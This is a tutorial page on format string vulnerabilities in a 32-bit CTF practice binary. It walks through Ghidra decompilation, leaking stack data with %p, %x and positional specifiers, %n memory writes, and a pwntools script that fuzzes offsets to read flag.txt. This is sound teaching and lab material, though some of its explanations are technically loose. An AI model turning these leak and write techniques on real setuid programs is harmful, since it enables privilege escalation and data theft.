Skip to content

Latest commit

 

History

History
322 lines (218 loc) · 12.5 KB

format-string-vulnerabilities.md

File metadata and controls

322 lines (218 loc) · 12.5 KB
description
08/26/2023

🥵 Format String Vulnerabilities

Introduction

What will we be learning?

We will be learning how to identify and utilize format string vulnerabilities in programs to be able to leak addresses and other data off the stack.

Great Reference

{% embed url="https://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html" %}

GitHub

{% embed url="https://github.com/Crypto-Cat/CTF/tree/main/pwn/binary_exploitation_101/07-format_string_vulns" %} Grab the target binary here and other files {% endembed %}

Awesome PDF (check this out)

{% file src="../.gitbook/assets/Format_String.pdf" %}

Video Tutorial

{% embed url="https://www.youtube.com/watch?v=iwNYoDw1hW4" %} The all mighty CryptoCat {% endembed %}

Set Proper File Permissions

sudo chown root:root format_vuln
sudo chmod 4655 format_vuln -- This will set the "sticky bit"
sudo chown root:root flag.txt
sudo chmod 600 flag.txt

Enumeration

file:

{% code overflow="wrap" %}

format_vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=c6e50d7e3fe3796407a1827f21d01f343dbaf3fa, for GNU/Linux 3.2.0, not stripped

{% endcode %}

  • 32-bit
  • Dynamically linked to libc library
  • Not stripped

checksec:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
  • NX Enabled

"Messing around with the program"

Something that you want to get into the habit of, is simply just running the binary and asking yourself "what is the program doing? What is the point of the program? What conditions is it requiring?"

These types of questions will help you gain a serious level of situational awareness and allow you to better process what is happening on the stack while looking at assembly, when looking at decompilation, etc.

Okay, we can see that we are likely using printf() to be able to print out our STDIN.

Also, notice how we cannot overflow the buffer, is fgets() being used to check against the size of the buffer?

It also appears that we are in some type of loop.

Reversing

I know that the video highlights source code analysis, but often we find ourselves in the situation more times than not with just the binary alone and no source code.

Load up the binary in Ghidra.

Decompilation of main() variables and conversions have been made:

void main(void)

{
  char buffer_1 [64];
  char buffer_2 [64];
  FILE *local_1c;
  __gid_t local_18;
  char *local_14;
  undefined *puStack_10;
  
  puStack_10 = &stack0x00000004;
  setvbuf(_stdout,(char *)0x0,2,0);
  local_14 = buffer_1;
  local_18 = getegid();
  setresgid(local_18,local_18,local_18);
  puts("We will evaluate any format string you give us with printf().");
  local_1c = fopen("flag.txt","r");
  if (local_1c == (FILE *)0x0) {
     puts("flag.txt is missing!");
                         /* WARNING: Subroutine does not return */
     exit(0);
  }
  fgets(buffer_1,64,local_1c);
  do {
     printf("> ");
     fgets(buffer_2,64,_stdin);
     printf(buffer_2);
  } while( true );
}

Convert the original 0x40 in fgets() to decimal and you will see that it is taking the sizeof() our buffer (which is of 64-bytes). It will be converted to hex 0x40 to 64 decimal.

Renamed variables pertaining to buffers to be easier to read:

  • Both buffers are of 64-bytes
    • We see a variable that is being pointed to something (*)
  • fopen() is pointing to a file descriptor and the string is flag.txt. It is then using the "r" argument to read from the file.
  • Here, we aren't using gets(), but rather fgets() which is not a dangerous function because it is only going to read the flag size of 64-bytes
  • We will then use printf() to display ">" to act as a console
  • fgets() will then utilize _stdin to take in our STDIN/input
  • We then see that fgets() is taking the sizeof() our buffer of 64-bytes. There is no vulnerability here because it is checking STDIN is of 64-bytes.
  • Lastly, we see printf(buffer_2) which is where our vulnerability can be found
  • Also, I felt it was important to mention that we will be looping while true, giving us an infinite loop, never-ending program

Vulnerability

The second printf() call is where the vulnerability lies

The vulnerability lies in the printf() call itself.

You might be asking yourself, well there is no format specifier argument being used in the first printf() call, and you'd be right. So why is that not vulnerable? It is because our second printf() is taking user-input from STDIN from fgets() and placing it in buffer_2. Since STDIN is being used in the second printf() without a format specifier, this means that we fully control the format specifier.

Anytime that you take input from the user, you MUST specify which type of data you are expecting it to be.

This must be supplied to printf() as an argument, or it will result in a Format String Vulnerability.

In other words, if the developer does NOT specify a format specifier, the attacker can supply one for the printf() call.

Check out this diagram to view what format specifiers look like in C:

Format Specifier Type
%c Character
%d Signed integer
%e or %E Scientific notation of floats
%f Float values
%g or %G Similar as %e or %E
%hi Signed integer (short)
%hu Unsigned Integer (short)
%i Unsigned integer
%l or %ld or %li Long
%lf Double
%Lf Long double
%lu Unsigned int or unsigned long
%lli or %lld Long long
%llu Unsigned long long
%o Octal representation
%p Pointer
%s String
%u Unsigned int
%x or %X Hexadecimal representation
%n Prints nothing
%% Prints % character

Leaking Values off the Stack

Resources

{% embed url="https://vickieli.dev/binary%20exploitation/format-string-vulnerabilities/" %} This guide is OP {% endembed %}

Keep in mind that we can literally print anything from the stack and even data not located on the stack with this vulnerability.

This includes:

  • Global Offset Table (GOT)
  • Anything else

Manual Method

So, with the Format String Vulnerability identified, since the attacker can supply their own format specifier, let's do so:

  1. We sent %p and was able to return pointers.
  2. We sent %x and was able to return hex values.
  3. We sent %c and was able to return char values.

If we tried to simply print out the values as a string using a string format specifier, we would segmentation fault.

Why is that?

This is because it will try to print the value as a pointer which will lead to an address that is not within the program's memory range, leading to a program crash and segmentation fault.

This can also be explained as %s treating the data on the stack as an address to go grab the string from. This is also known as pass by reference.

This means that we could even read from any address, even if the data is not located on the stack.

This is all stemming from the fact that we fully control the format string.

What is the data in these values?

We can use unhex to convert these values because they are all hex values!

unhex 67616c66
galf

Interesting, that's flag backwards. It's represented this way due to little-endian.

I wonder if we can find our flag in memory by leaking values from the stack 🤔.

Side note (and a quick laugh)

A typo led me to discover that we can use %m to display the error message to the current value of the function:

Result

Explanation

Positional Arguments with printf()

Notice how 67616c66 is our fifth element that was printed.

If we use printf()'s positional arguments, we can print that exact value:

%5$x
67616c66

%5$x
0x67616c66

Interesting. Let's see if we can print out the entire flag from this leak.

Overwriting Memory at any Location

In printf(), we can use %n to cause the number of characters written so far to be stored in the function argument.

Remember, we FULLY control the format string.

This means that we can write arbitrary integers to the location pointed to by a function argument.

For example, the following code will store the integer 5 into the variable num_char.

int num_char; 
printf("11111%n", &num_char);

You can also pass an arbitrary value to printf() as a value. This allows you to be able to take a format string vulnerability to be able to write data using %n.

You can write arbitrary data using this method:

AAAA%10$p

This will write 4 A's to our address.

Automating Format String Vulns w/ pwntools

{% embed url="https://docs.pwntools.com/en/stable/fmtstr.html" %}

fuzz.py:

from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./format_vuln', checksec=False)

# Let's fuzz 100 values
for i in range(100):
    try:
        # Create process (level used to reduce noise)
        p = process(level='error')
        # When we see the user prompt '>', format the counter
        # e.g. %2$s will attempt to print second pointer as string
        p.sendlineafter(b'> ', '%{}$s'.format(i).encode())
        # Receive the response
        result = p.recvuntil(b'> ')
        # Check for flag
        # if("flag" in str(result).lower()):
        print(str(i) + ': ' + str(result))
        # Exit the process
        p.close()
    except EOFError:
        pass

Result:

We are able to see the contents of flag.txt in the 39th element

Quick Note for 64-bit Binaries

Be sure to print as pointers rather than hex so that you get the full value!!!

If an address is pointing to a libc function, we can subtract the function to get back to the base and be able to perform ret2libc!